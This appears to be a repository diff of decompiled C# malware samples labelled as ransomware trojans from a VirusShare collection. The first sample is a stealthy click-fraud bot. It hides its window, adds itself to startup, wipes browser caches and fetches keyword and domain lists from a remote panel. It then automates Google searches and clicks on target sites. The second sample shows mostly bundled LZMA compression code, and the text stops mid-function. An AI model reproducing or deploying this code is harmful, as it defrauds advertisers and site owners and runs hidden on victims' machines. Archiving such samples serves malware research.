private Random rnd = new Random();
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.webBrowser1 = new WebBrowser();
this.SuspendLayout();
this.webBrowser1.Dock = DockStyle.Fill;
this.webBrowser1.IsWebBrowserContextMenuEnabled = false;
this.webBrowser1.Location = new Point(0, 0);
this.webBrowser1.Name = "webBrowser1";
this.webBrowser1.ScriptErrorsSuppressed = true;
this.webBrowser1.Size = new Size(761, 488);
this.webBrowser1.TabIndex = 0;
this.webBrowser1.WebBrowserShortcutsEnabled = false;
this.webBrowser1.DocumentCompleted += new WebBrowserDocumentCompletedEventHandler(this.webBrowser1_DocumentCompleted);
this.webBrowser1.NewWindow += new CancelEventHandler(this.webBrowser1_NewWindow);
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(761, 488);
this.Controls.Add((Control) this.webBrowser1);
this.Name = nameof (Form1);
this.Opacity = 0.0;
this.ShowIcon = false;
this.ShowInTaskbar = false;
this.StartPosition = FormStartPosition.CenterScreen;
this.Load += new EventHandler(this.Form1_Load);
this.ResumeLayout(false);
}
[DllImport("user32.dll")]
public static extern bool SetForegroundWindow(IntPtr hWnd);
[DllImport("user32.dll")]
public static extern int SetWindowLong(IntPtr window, int index, int value);
[DllImport("user32.dll")]
public static extern int GetWindowLong(IntPtr window, int index);
[DllImport("winmm.dll")]
public static extern int sndPlaySound(string lpszSoundName, int uFlags);
[DllImport("wininet.dll", SetLastError = true)]
private static extern bool InternetSetOption(
IntPtr hInternet,
int dwOption,
IntPtr lpBuffer,
int lpdwBufferLength);
public Form1() => this.InitializeComponent();
private void webBrowser1_NewWindow(object sender, CancelEventArgs e) => e.Cancel = true;
private void Basla()
{
this.DeleteCache();
try
{
this.suankisayfa = 1;
KeyValuePair<string, string> keyValuePair = this.kelimelistesi.Dequeue();
this.kelime = keyValuePair.Key;
this.domain = keyValuePair.Value;
while (this.webBrowser1.IsBusy)
Thread.SpinWait(10000);
this.webBrowser1.Navigate("http://www.google.com.tr");
}
catch (InvalidOperationException ex)
{
Environment.Exit(-1);
}
}
private void KelimeleriCek()
{
using (WebClient webClient = new WebClient())
{
string str1 = "";
try
{
str1 = webClient.DownloadString(this.baba);
}
catch (Exception ex)
{
Environment.Exit(-1);
}
string str2 = str1;
char[] chArray = new char[1]{ '\n' };
foreach (string str3 in str2.Split(chArray))
{
string[] strArray = str3.Trim().Split('|');
try
{
string key = strArray[1];
KeyValuePair<string, string> keyValuePair = new KeyValuePair<string, string>(strArray[0], key);
this.gezilenler.Add(key, false);
this.kelimelistesi.Enqueue(keyValuePair);
}
catch
{
}
}
}
}
private void BirineTikla()
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
{
if (htmlElement.GetAttribute("name").Contains("btnG") || htmlElement.GetAttribute("name").Contains("btnK"))
{
htmlElement.RaiseEvent("onmouseover");
htmlElement.RaiseEvent("onmousedown");
htmlElement.InvokeMember("click");
}
}
}
private void ButonTikla(string attribute, string value)
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
{
if (htmlElement.GetAttribute(attribute).Contains(value))
{
htmlElement.RaiseEvent("onmouseover");
htmlElement.RaiseEvent("onmousedown");
htmlElement.InvokeMember("click");
}
}
}
private void ButonaTekrarTikla(string attribute, string value)
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("button"))
{
if (htmlElement.GetAttribute(attribute).Contains(value))
{
htmlElement.RaiseEvent("onmouseover");
htmlElement.RaiseEvent("onmousedown");
htmlElement.InvokeMember("click");
}
}
}
private void webBrowser1_DocumentCompleted(
object sender,
WebBrowserDocumentCompletedEventArgs e)
{
string str = e.Url.ToString();
if (str == "http://www.google.com.tr/")
this.SureliIslet((Form1.SureliFonksiyon) (() =>
{
this.TextBoxYaz("name", "q", this.kelime);
this.SureliIslet(new Form1.SureliFonksiyon(this.SubmitForm), 4000, 5000);
}), 2000, 4000);
else if (str.StartsWith("http://www.google.com.tr") && str.Contains("hl=tr"))
{
int suankisayfa = this.suankisayfa;
this.SureliIslet((Form1.SureliFonksiyon) (() =>
{
if (this.LinkeTikla(this.domain))
return;
this.SureliIslet(new Form1.SureliFonksiyon(this.Ilerle), 5000, 12000);
}), 3000, 6000);
}
else
{
if (!str.Contains(this.domain) || str.StartsWith("http://www.google.com"))
return;
this.SureliIslet((Form1.SureliFonksiyon) (() =>
{
if (this.gezilenler[this.domain])
return;
this.gezilenler[this.domain] = true;
this.RastGeleGez();
}), 20000, 50000);
}
}
private void SubmitForm()
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("Form"))
htmlElement.InvokeMember("submit");
}
private void Ilerle()
{
++this.suankisayfa;
foreach (HtmlElement link in this.webBrowser1.Document.Links)
{
if (link.OuterText == this.suankisayfa.ToString() || link.OuterText == this.suankisayfa.ToString() + " ")
{
link.RaiseEvent("onmouseover");
link.RaiseEvent("onmousedown");
link.InvokeMember("click");
}
}
}
private void RastGeleGez()
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
HtmlElementCollection elementsByTagName = this.webBrowser1.Document.GetElementsByTagName("a");
List<HtmlElement> htmlElementList = new List<HtmlElement>(elementsByTagName.Count);
if (elementsByTagName.Count > 0)
{
foreach (HtmlElement htmlElement in elementsByTagName)
{
if (htmlElement.GetAttribute("target") != "_blank" && !string.IsNullOrEmpty(htmlElement.InnerText) && this.NormalLink(htmlElement.GetAttribute("href")))
htmlElementList.Add(htmlElement);
}
if (htmlElementList.Count > 0)
{
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].RaiseEvent("onmouseover");
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].RaiseEvent("onmousedown");
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].InvokeMember("click");
htmlElementList.Clear();
}
}
this.SureliIslet((Form1.SureliFonksiyon) (() => this.SureliIslet(new Form1.SureliFonksiyon(this.Basla), 240001, 241000)), 5000, 6000);
}
private bool NormalLink(string url) => !url.EndsWith("xml") && !url.EndsWith("@") && !url.EndsWith("SetHomePage") && !url.EndsWith("AddFavorite") && !url.EndsWith(".jpg") && !url.EndsWith(".gif") && !url.EndsWith(".png") && !url.EndsWith(".rar") && !url.EndsWith(".zip") && !url.EndsWith(".vcf") && !url.EndsWith(".exe") && !url.EndsWith(".mp3") && !url.EndsWith(".mp4") && !url.EndsWith("mailto");
private void DeleteCache()
{
Process.Start(new ProcessStartInfo()
{
FileName = "RunDll32.exe",
Arguments = "InetCpl.cpl,ClearMyTracksByProcess 1"
}).WaitForExit();
Process.Start(new ProcessStartInfo()
{
FileName = "RunDll32.exe",
Arguments = "InetCpl.cpl,ClearMyTracksByProcess 8"
}).WaitForExit();
Form1.InternetSetOption(IntPtr.Zero, 42, IntPtr.Zero, 0);
}
private void TextBoxYaz(string att, string attname, string attvalue)
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
{
if (htmlElement.GetAttribute(att).Equals(attname))
htmlElement.SetAttribute("value", attvalue);
}
}
private bool LinkeTikla(string url)
{
bool flag = false;
List<string> stringList = new List<string>();
if (this.webBrowser1.Document != (HtmlDocument) null)
{
foreach (HtmlElement link in this.webBrowser1.Document.Links)
{
string attribute = link.GetAttribute("href");
stringList.Add(attribute);
if (!attribute.Contains("//webcache.googleusercontent.com") && !attribute.Contains("&amp;q=related:") && link.GetAttribute("href").Contains(url))
{
link.RaiseEvent("onmouseover");
link.RaiseEvent("onmousedown");
link.InvokeMember("Click");
flag = true;
break;
}
}
}
return flag;
}
private void SureliIslet(Form1.SureliFonksiyon x, int min, int max)
{
System.Windows.Forms.Timer timer = new System.Windows.Forms.Timer()
{
Interval = this.rnd.Next(min, max)
};
timer.Tick += (EventHandler) ((s, ev) =>
{
x();
((System.Windows.Forms.Timer) s).Stop();
((Component) s).Dispose();
});
timer.Start();
}
private void PanelAyarla()
{
string newValue = "";
WebHeaderCollection headerCollection1 = new WebHeaderCollection();
headerCollection1.Add("User-Agent", "Mozilla/4.0 (compatiple; MSIE 6.0; Windows NT 5.1)");
WebHeaderCollection headerCollection2 = headerCollection1;
using (WebClient webClient = new WebClient()
{
Encoding = Encoding.Default,
Headers = headerCollection2
})
{
try
{
newValue = new Regex("1(.*?)2", RegexOptions.IgnoreCase | RegexOptions.Compiled).Match(webClient.DownloadString(this.ana)).Groups[1].ToString();
}
catch (Exception ex)
{
Environment.Exit(-1);
}
}
this.baba = this.baba.Replace("[DEGISTIR]", newValue);
}
private void Form1_Load(object sender, EventArgs e)
{
this.Size = new Size(this.rnd.Next(1280, 1366), this.rnd.Next(600, 700));
Form1.SetWindowLong(this.Handle, -20, Form1.GetWindowLong(this.Handle, -20) | 128);
this.ieKontrol();
this.PanelAyarla();
this.KelimeleriCek();
Araclar.DisableClickSounds();
this.Basla();
}
private void ieKontrol()
{
if (new WebBrowser().Version.Major < 7)
Environment.Exit(-1);
}
private delegate void SureliFonksiyon();
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/browser_bastan/Program.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: browser_bastan.Program
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using SmartAssembly.MemoryManagement;
using System;
using System.IO;
using System.Threading;
using System.Windows.Forms;
namespace browser_bastan
{
internal static class Program
{
public static Mutex AppMutex = new Mutex(true, "{8F6F0AC4-B9A1-45fd-A8CF-72F04X6FDCCM}");
[STAThread]
private static void Main()
{
MemoryManager.AttachApp();
if (Program.AppMutex.WaitOne(TimeSpan.Zero, true))
{
Program.CheckHostsFile();
string path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\" + Araclar.DstName;
Araclar.DstCheck();
Araclar.Startup(Araclar.Regkeyname, path);
Thread.Sleep(new Random().Next(5000, 60000));
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run((Form) new Form1());
Program.AppMutex.ReleaseMutex();
}
else
Environment.Exit(1);
}
public static void CheckHostsFile()
{
if (!File.ReadAllText(Environment.GetEnvironmentVariable("windir") + "\\system32\\drivers\\etc\\hosts").Contains("nurullahuzmez.com"))
return;
Environment.Exit(1);
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/{b9141284-224a-4b92-8f0a-8b542563c270}
BIN
View File
Binary file not shown.
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/AssemblyInfo.cs
+15
View File
@@ -0,0 +1,15 @@
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Permissions;
[assembly: AssemblyCompany("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyProduct("")]
[assembly: ComVisible(false)]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Buffer/InBuffer.cs
+63
View File
@@ -0,0 +1,63 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Buffer.InBuffer
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using System;
using System.IO;
namespace SevenZip.Buffer
{
public class InBuffer
{
private byte[] m_Buffer;
private uint m_Pos;
private uint m_Limit;
private uint m_BufferSize;
private Stream m_Stream;
private bool m_StreamWasExhausted;
private ulong m_ProcessedSize;
public InBuffer(uint bufferSize)
{
this.m_Buffer = new byte[(IntPtr) bufferSize];
this.m_BufferSize = bufferSize;
}
public void Init(Stream stream)
{
this.m_Stream = stream;
this.m_ProcessedSize = 0UL;
this.m_Limit = 0U;
this.m_Pos = 0U;
this.m_StreamWasExhausted = false;
}
public bool ReadBlock()
{
if (this.m_StreamWasExhausted)
return false;
this.m_ProcessedSize += (ulong) this.m_Pos;
int num = this.m_Stream.Read(this.m_Buffer, 0, (int) this.m_BufferSize);
this.m_Pos = 0U;
this.m_Limit = (uint) num;
this.m_StreamWasExhausted = num == 0;
return !this.m_StreamWasExhausted;
}
public void ReleaseStream() => this.m_Stream = (Stream) null;
public bool ReadByte(byte b)
{
if (this.m_Pos >= this.m_Limit && !this.ReadBlock())
return false;
b = this.m_Buffer[(IntPtr) this.m_Pos++];
return true;
}
public byte ReadByte() => this.m_Pos >= this.m_Limit && !this.ReadBlock() ? byte.MaxValue : this.m_Buffer[(IntPtr) this.m_Pos++];
public ulong GetProcessedSize() => this.m_ProcessedSize + (ulong) this.m_Pos;
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Buffer/OutBuffer.cs
+58
View File
@@ -0,0 +1,58 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Buffer.OutBuffer
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using System;
using System.IO;
namespace SevenZip.Buffer
{
public class OutBuffer
{
private byte[] m_Buffer;
private uint m_Pos;
private uint m_BufferSize;
private Stream m_Stream;
private ulong m_ProcessedSize;
public OutBuffer(uint bufferSize)
{
this.m_Buffer = new byte[(IntPtr) bufferSize];
this.m_BufferSize = bufferSize;
}
public void SetStream(Stream stream) => this.m_Stream = stream;
public void FlushStream() => this.m_Stream.Flush();
public void CloseStream() => this.m_Stream.Close();
public void ReleaseStream() => this.m_Stream = (Stream) null;
public void Init()
{
this.m_ProcessedSize = 0UL;
this.m_Pos = 0U;
}
public void WriteByte(byte b)
{
this.m_Buffer[(IntPtr) this.m_Pos++] = b;
if (this.m_Pos < this.m_BufferSize)
return;
this.FlushData();
}
public void FlushData()
{
if (this.m_Pos == 0U)
return;
this.m_Stream.Write(this.m_Buffer, 0, (int) this.m_Pos);
this.m_Pos = 0U;
}
public ulong GetProcessedSize() => this.m_ProcessedSize + (ulong) this.m_Pos;
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/CRC.cs
+53
View File
@@ -0,0 +1,53 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.CRC
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using System;
namespace SevenZip
{
internal class CRC
{
public static readonly uint[] Table = new uint[256];
private uint _value = uint.MaxValue;
static CRC()
{
for (uint index1 = 0; index1 < 256U; ++index1)
{
uint num = index1;
for (int index2 = 0; index2 < 8; ++index2)
{
if (((int) num & 1) != 0)
num = num >> 1 ^ 3988292384U;
else
num >>= 1;
}
CRC.Table[(IntPtr) index1] = num;
}
}
public void Init() => this._value = uint.MaxValue;
public void UpdateByte(byte b) => this._value = CRC.Table[(int) (byte) this._value ^ (int) b] ^ this._value >> 8;
public void Update(byte[] data, uint offset, uint size)
{
for (uint index = 0; index < size; ++index)
this._value = CRC.Table[(int) (byte) this._value ^ (int) data[(IntPtr) (offset + index)]] ^ this._value >> 8;
}
public uint GetDigest() => this._value ^ uint.MaxValue;
private static uint CalculateDigest(byte[] data, uint offset, uint size)
{
CRC crc = new CRC();
crc.Update(data, offset, size);
return crc.GetDigest();
}
private static bool VerifyDigest(uint digest, byte[] data, uint offset, uint size) => (int) CRC.CalculateDigest(data, offset, size) == (int) digest;
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/CoderPropID.cs
+27
View File
@@ -0,0 +1,27 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.CoderPropID
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
namespace SevenZip
{
public enum CoderPropID
{
DefaultProp,
DictionarySize,
UsedMemorySize,
Order,
BlockSize,
PosStateBits,
LitContextBits,
LitPosBits,
NumFastBytes,
MatchFinder,
MatchFinderCycles,
NumPasses,
Algorithm,
NumThreads,
EndMarker,
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5/Compression/LZ/BinTree.cs
+370
View File
@@ -0,0 +1,370 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.LZ.BinTree
// Assembly: P4CTEMP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7BE4E538-8555-4C2E-974B-99E556F5462C
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-624a52079bf1703bcd3bcc9d2d3716b6126fd05655e25289d19142f9aae02eb5.exe
using System;
using System.IO;
namespace SevenZip.Compression.LZ
{
public class BinTree : InWindow, IMatchFinder, IInWindowStream
{
private const uint kHash2Size = 1024;
private const uint kHash3Size = 65536;
private const uint kBT2HashSize = 65536;
private const uint kStartMaxLen = 1;
private const uint kHash3Offset = 1024;
private const uint kEmptyHashValue = 0;
private const uint kMaxValForNormalize = 2147483647;
private uint _cyclicBufferPos;
private uint _cyclicBufferSize;
private uint _matchMaxLen;
private uint[] _son;
private uint[] _hash;
private uint _cutValue = (uint) byte.MaxValue;
private uint _hashMask;
private uint _hashSizeSum;
private bool HASH_ARRAY = true;
private uint kNumHashDirectBytes;
private uint kMinMatchCheck = 4;
private uint kFixHashSize = 66560;
public void SetType(int numHashBytes)
{
this.HASH_ARRAY = numHashBytes > 2;
if (this.HASH_ARRAY)
{
this.kNumHashDirectBytes = 0U;
this.kMinMatchCheck = 4U;
this.kFixHashSize = 66560U;
}
else
{
this.kNumHashDirectBytes = 2U;
this.kMinMatchCheck = 3U;
this.kFixHashSize = 0U;
}
}
public new void SetStream(Stream stream) => base.SetStream(stream);
public new void ReleaseStream() => base.ReleaseStream();
public new void Init()
{
base.Init();
for (uint index = 0; index < this._hashSizeSum; ++index)
this._hash[(IntPtr) index] = 0U;
this._cyclicBufferPos = 0U;
this.ReduceOffsets(-1);
}
public new void MovePos()
{
if (++this._cyclicBufferPos >= this._cyclicBufferSize)
this._cyclicBufferPos = 0U;
base.MovePos();
if (this._pos != (uint) int.MaxValue)
return;
this.Normalize();
}
public new byte GetIndexByte(int index) => base.GetIndexByte(index);
public new uint GetMatchLen(int index, uint distance, uint limit) => base.GetMatchLen(index, distance, limit);
public new uint GetNumAvailableBytes() => base.GetNumAvailableBytes();
public void Create(
uint historySize,
uint keepAddBufferBefore,
uint matchMaxLen,
uint keepAddBufferAfter)
{
if (historySize > 2147483391U)
throw new Exception();
this._cutValue = 16U + (matchMaxLen >> 1);
uint keepSizeReserv = (historySize + keepAddBufferBefore + matchMaxLen + keepAddBufferAfter) / 2U + 256U;
this.Create(historySize + keepAddBufferBefore, matchMaxLen + keepAddBufferAfter, keepSizeReserv);
this._matchMaxLen = matchMaxLen;
uint num1 = historySize + 1U;
if ((int) this._cyclicBufferSize != (int) num1)
this._son = new uint[(IntPtr) ((this._cyclicBufferSize = num1) * 2U)];
uint num2 = 65536;
if (this.HASH_ARRAY)
{
uint num3 = historySize - 1U;
uint num4 = num3 | num3 >> 1;
uint num5 = num4 | num4 >> 2;
uint num6 = num5 | num5 >> 4;
uint num7 = (num6 | num6 >> 8) >> 1 | (uint) ushort.MaxValue;
if (num7 > 16777216U)
num7 >>= 1;
this._hashMask = num7;
num2 = num7 + 1U + this.kFixHashSize;
}
if ((int) num2 == (int) this._hashSizeSum)
return;
this._hash = new uint[(IntPtr) (this._hashSizeSum = num2)];
}
public uint GetMatches(uint[] distances)
{
uint num1;
if (this._pos + this._matchMaxLen <= this._streamPos)
{
num1 = this._matchMaxLen;
}
else
{
num1 = this._streamPos - this._pos;
if (num1 < this.kMinMatchCheck)
{
this.MovePos();
return 0;
}
}
uint matches = 0;
uint num2 = this._pos > this._cyclicBufferSize ? this._pos - this._cyclicBufferSize : 0U;
uint index1 = this._bufferOffset + this._pos;
uint num3 = 1;
uint index2 = 0;
uint num4 = 0;
uint num5;
if (this.HASH_ARRAY)
{
uint num6 = CRC.Table[(int) this._bufferBase[(IntPtr) index1]] ^ (uint) this._bufferBase[(IntPtr) (index1 + 1U)];
index2 = num6 & 1023U;
uint num7 = num6 ^ (uint) this._bufferBase[(IntPtr) (index1 + 2U)] << 8;
num4 = num7 & (uint) ushort.MaxValue;
num5 = (num7 ^ CRC.Table[(int) this._bufferBase[(IntPtr) (index1 + 3U)]] << 5) & this._hashMask;
}
else
num5 = (uint) this._bufferBase[(IntPtr) index1] ^ (uint) this._bufferBase[(IntPtr) (index1 + 1U)] << 8;
uint num8 = this._hash[(IntPtr) (this.kFixHashSize + num5)];
if (this.HASH_ARRAY)
{
uint num9 = this._hash[(IntPtr) index2];
uint num10 = this._hash[(IntPtr) (1024U + num4)];
this._hash[(IntPtr) index2] = this._pos;
this._hash[(IntPtr) (1024U + num4)] = this._pos;
if (num9 > num2 && (int) this._bufferBase[(IntPtr) (this._bufferOffset + num9)] == (int) this._bufferBase[(IntPtr) index1])
{
uint[] numArray1 = distances;
int num11 = (int) matches;
uint num12 = (uint) (num11 + 1);
uint index3 = (uint) num11;
int num13;
num3 = (uint) (num13 = 2);
numArray1[(IntPtr) index3] = (uint) num13;
uint[] numArray2 = distances;
int num14 = (int) num12;
matches = (uint) (num14 + 1);
uint index4 = (uint) num14;
int num15 = (int) this._pos - (int) num9 - 1;
numArray2[(IntPtr) index4] = (uint) num15;
}
if (num10 > num2 && (int) this._bufferBase[(IntPtr) (this._bufferOffset + num10)] == (int) this._bufferBase[(IntPtr) index1])
{
if ((int) num10 == (int) num9)
matches -= 2U;
uint[] numArray3 = distances;
int num16 = (int) matches;
uint num17 = (uint) (num16 + 1);
uint index5 = (uint) num16;
int num18;
num3 = (uint) (num18 = 3);
numArray3[(IntPtr) index5] = (uint) num18;
uint[] numArray4 = distances;
int num19 = (int) num17;
matches = (uint) (num19 + 1);
uint index6 = (uint) num19;
int num20 = (int) this._pos - (int) num10 - 1;
numArray4[(IntPtr) index6] = (uint) num20;
num9 = num10;
}
if (matches != 0U && (int) num9 == (int) num8)
{
matches -= 2U;
num3 = 1U;
}
}
this._hash[(IntPtr) (this.kFixHashSize + num5)] = this._pos;
uint index7 = (uint) (((int) this._cyclicBufferPos << 1) + 1);
uint index8 = this._cyclicBufferPos << 1;
uint val2;
uint val1 = val2 = this.kNumHashDirectBytes;
if (this.kNumHashDirectBytes != 0U && num8 > num2 && (int) this._bufferBase[(IntPtr) (this._bufferOffset + num8 + this.kNumHashDirectBytes)] != (int) this._bufferBase[(IntPtr) (index1 + this.kNumHashDirectBytes)])
{
uint[] numArray5 = distances;
int num21 = (int) matches;
uint num22 = (uint) (num21 + 1);
uint index9 = (uint) num21;
int numHashDirectBytes;
num3 = (uint) (numHashDirectBytes = (int) this.kNumHashDirectBytes);
numArray5[(IntPtr) index9] = (uint) numHashDirectBytes;
uint[] numArray6 = distances;
int num23 = (int) num22;
matches = (uint) (num23 + 1);
uint index10 = (uint) num23;
int num24 = (int) this._pos - (int) num8 - 1;
numArray6[(IntPtr) index10] = (uint) num24;
}
uint cutValue = this._cutValue;
while (num8 > num2 && cutValue-- != 0U)
{
uint num25 = this._pos - num8;
uint index11 = (uint) ((num25 <= this._cyclicBufferPos ? (int) this._cyclicBufferPos - (int) num25 : (int) this._cyclicBufferPos - (int) num25 + (int) this._cyclicBufferSize) << 1);
uint num26 = this._bufferOffset + num8;
uint num27 = Math.Min(val1, val2);
if ((int) this._bufferBase[(IntPtr) (num26 + num27)] == (int) this._bufferBase[(IntPtr) (index1 + num27)])
{
do
;
while ((int) ++num27 != (int) num1 && (int) this._bufferBase[(IntPtr) (num26 + num27)] == (int) this._bufferBase[(IntPtr) (index1 + num27)]);
if (num3 < num27)
{
uint[] numArray7 = distances;
int num28 = (int) matches;
uint num29 = (uint) (num28 + 1);
uint index12 = (uint) num28;
int num30;
num3 = (uint) (num30 = (int) num27);
numArray7[(IntPtr) index12] = (uint) num30;
uint[] numArray8 = distances;
int num31 = (int) num29;
matches = (uint) (num31 + 1);
uint index13 = (uint) num31;
int num32 = (int) num25 - 1;
numArray8[(IntPtr) index13] = (uint) num32;
if ((int) num27 == (int) num1)
{
this._son[(IntPtr) index8] = this._son[(IntPtr) index11];
this._son[(IntPtr) index7] = this._son[(IntPtr) (index11 + 1U)];
goto label_29;
}
}
}
if ((int) this._bufferBase[(IntPtr) (num26 + num27)] < (int) this._bufferBase[(IntPtr) (index1 + num27)])
{
this._son[(IntPtr) index8] = num8;
index8 = index11 + 1U;
num8 = this._son[(IntPtr) index8];
val2 = num27;
}
else
{
this._son[(IntPtr) index7] = num8;
index7 = index11;
num8 = this._son[(IntPtr) index7];
val1 = num27;
}
}
this._son[(IntPtr) index7] = this._son[(IntPtr) index8] = 0U;
label_29:
this.MovePos();
return matches;
}
public void Skip(uint num)
{
do
{
uint num1;
if (this._pos + this._matchMaxLen <= this._streamPos)
{
num1 = this._matchMaxLen;
}
else
{
num1 = this._streamPos - this._pos;
if (num1 < this.kMinMatchCheck)
{
this.MovePos();
goto label_19;
}
}
uint num2 = this._pos > this._cyclicBufferSize ? this._pos - this._cyclicBufferSize : 0U;
uint index1 = this._bufferOffset + this._pos;
uint num3;
if (this.HASH_ARRAY)
{
uint num4 = CRC.Table[(int) this._bufferBase[(IntPtr) index1]] ^ (uint) this._bufferBase[(IntPtr) (index1 + 1U)];
this._hash[(IntPtr) (num4 & 1023U)] = this._pos;
uint num5 = num4 ^ (uint) this._bufferBase[(IntPtr) (index1 + 2U)] << 8;
this._hash[(IntPtr) (1024U + (num5 & (uint) ushort.MaxValue))] = this._pos;
num3 = (num5 ^ CRC.Table[(int) this._bufferBase[(IntPtr) (index1 + 3U)]] << 5) & this._hashMask;
}
else
num3 = (uint) this._bufferBase[(IntPtr) index1] ^ (uint) this._bufferBase[(IntPtr) (index1 + 1U)] << 8;
uint num6 = this._hash[(IntPtr) (this.kFixHashSize + num3)];
this._hash[(IntPtr) (this.kFixHashSize + num3)] = this._pos;
uint index2 = (uint) (((int) this._cyclicBufferPos << 1) + 1);
uint index3 = this._cyclicBufferPos << 1;
uint val2;
uint val1 = val2 = this.kNumHashDirectBytes;
uint cutValue = this._cutValue;
while (num6 > num2 && cutValue-- != 0U)
{
uint num7 = this._pos - num6;
uint index4 = (uint) ((num7 <= this._cyclicBufferPos ? (int) this._cyclicBufferPos - (int) num7 : (int) this._cyclicBufferPos - (int) num7 + (int) this._cyclicBufferSize) << 1);
uint num8 = this._bufferOffset + num6;
uint num9 = Math.Min(val1, val2);
if ((int) this._bufferBase[(IntPtr) (num8 + num9)] == (int) this._bufferBase[(IntPtr) (index1 + num9)])
{
do
;
while ((int) ++num9 != (int) num1 && (int) this._bufferBase[(IntPtr) (num8 + num9)] == (int) this._bufferBase[(IntPtr) (index1 + num9)]);
if ((int) num9 == (int) num1)
{
this._son[(IntPtr) index3] = this._son[(IntPtr) index4];
this._son[(IntPtr) index2] = this._son[(IntPtr) (index4 + 1U)];
goto label_18;
}
}
if ((int) this._bufferBase[(IntPtr) (num8 + num9)] < (int) this._bufferBase[(IntPtr) (index1 + num9)])
{
this._son[(IntPtr) index3] = num6;
index3 = index4 + 1U;
